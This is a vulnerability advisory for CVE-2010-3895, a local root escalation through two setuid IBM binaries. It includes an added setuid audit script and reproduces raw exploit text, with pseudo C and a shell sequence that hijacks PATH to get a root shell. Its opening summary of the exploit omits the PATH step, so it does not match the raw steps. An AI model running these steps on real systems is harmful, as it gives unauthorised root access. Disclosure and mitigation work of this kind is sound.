Vendor: esRunCommand and estaskwrapper
By: None
CVSS: 7.2 (HIGH)
Type: Privilege Escalation
CWE: 264
Product Name: esRunCommand and estaskwrapper
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2010-3895
CPE: None
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«. esRunCommand takes one argument and runs it as root. The application »estaskwrapper« is meant to start the application »estasklight«. If the user has the environment variable »ES_LIBRARY_PATH« set, the value is copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«. If the »auth« flag is set, the application »estasklight« is executed via execvp(), i.e. resolved through the caller's PATH while the process runs as root. An exploit for running /bin/sh is to copy /bin/sh to ~/bin/estasklight, set the environment variable ES_LIBRARY_PATH to ~/bin and run /opt/IBM/es/bin/estaskwrapper estasklight.

Mitigation:

Ensure that the SUID bits are not set for the applications esRunCommand and estaskwrapper.
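An audit helper for this mitigation, added here as an example; it is neither part of the advisory nor of the IBM product. It reports whether the two binaries still carry the setuid bit and can clear it; the default directory is the one from the advisory listing.

```shell
#!/bin/sh
# Added example (not the advisory's or the vendor's code): audit the two
# binaries from CVE-2010-3895 for the setuid bit and optionally strip it.

# Print "SUID <path>" for every listed file that has the setuid bit set.
# Returns 0 when none of them is setuid (clean), 1 otherwise.
check_suid() {
    found=0
    for f in "$@"; do
        if [ -u "$f" ]; then
            printf 'SUID %s\n' "$f"
            found=1
        fi
    done
    return "$found"
}

# Mitigation from the advisory: clear the setuid bit on each listed file.
# Missing files are skipped; returns 1 if a bit could not be cleared.
strip_suid() {
    for f in "$@"; do
        [ -e "$f" ] || continue
        chmod u-s "$f" || return 1
        if [ -u "$f" ]; then
            return 1
        fi
    done
    return 0
}

# Audit the two affected binaries below the given directory
# (default: /opt/IBM/es/bin, the path shown in the advisory).
audit_es_binaries() {
    dir="${1:-/opt/IBM/es/bin}"
    check_suid "$dir/esRunCommand" "$dir/estaskwrapper"
}
```

After `strip_suid` has been run as a privileged user, a second `audit_es_binaries` should print nothing and exit 0.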
Source (Exploit-DB raw data):

* Privilege escalation in two applications (CVE-2010-3895)

Root SUID bits are set for the applications »esRunCommand« and »estaskwrapper«.

-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/estaskwrapper
-------------------------------------------------------------------------


»esRunCommand« takes one argument and runs it as root. See example below.
-------------------------------------------------------------------------
  -rwsr-xr-x 1 root users ... /opt/IBM/es/bin/esRunCommand
  
  joemueller@XXX:/opt/IBM/es/bin> ./esRunCommand id
  OUTPUT: cmd is id
  id
  uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------



The application »estaskwrapper« is meant to start the application »estasklight«.
The pseudo C code looks like this:
-------------------------------------------------------------------------
  int main(int argc, char **argv) {
    int auth = 0;
    ...
    /* first command line argument compared with the literal "estasklight" */
    if (strcmp(argv[1], "estasklight") == 0) {
      auth = 1;
      ...
      /* user-controlled value copied into the loader search path variables */
      path = getenv("ES_LIBRARY_PATH");
      if (path) {
        setenv("LD_LIBRARY_PATH", path, 1);
        setenv("LIBPATH", path, 1);
        ...
        if (auth) {
          /* execvp() resolves "estasklight" through PATH, not an absolute path */
          execvp("estasklight", args);
        }
        ...
      }
      ...
    }
    ...
  }
-------------------------------------------------------------------------


Explanation of the code:

»argv[1]« is the first command line argument, which is compared with the string
»estasklight«. If they are equal, the »auth« flag is set.
If the user has the environment variable »ES_LIBRARY_PATH« set, the value is
copied to two new environment variables »LD_LIBRARY_PATH« and »LIBPATH«.
If the »auth« flag is set, the application »estasklight« is executed. Because
»execvp« resolves a bare program name through the caller's »PATH« and the
process still runs with root privileges, whichever »estasklight« appears first
in the user's »PATH« is run as root.



Exploit for running /bin/sh
-------------------------------------------------------------------------
joemueller@XXX:~> cp /bin/sh ~/bin/estasklight
joemueller@XXX:~> export ES_LIBRARY_PATH=/home/joemueller
joemueller@XXX:~> export PATH=/home/joemueller/bin:$PATH
joemueller@XXX:~> /opt/IBM/es/bin/estaskwrapper estasklight
XXX:~# id
uid=0(root) gid=100(users) Gruppen=16(dialout),33(video),100(users)
-------------------------------------------------------------------------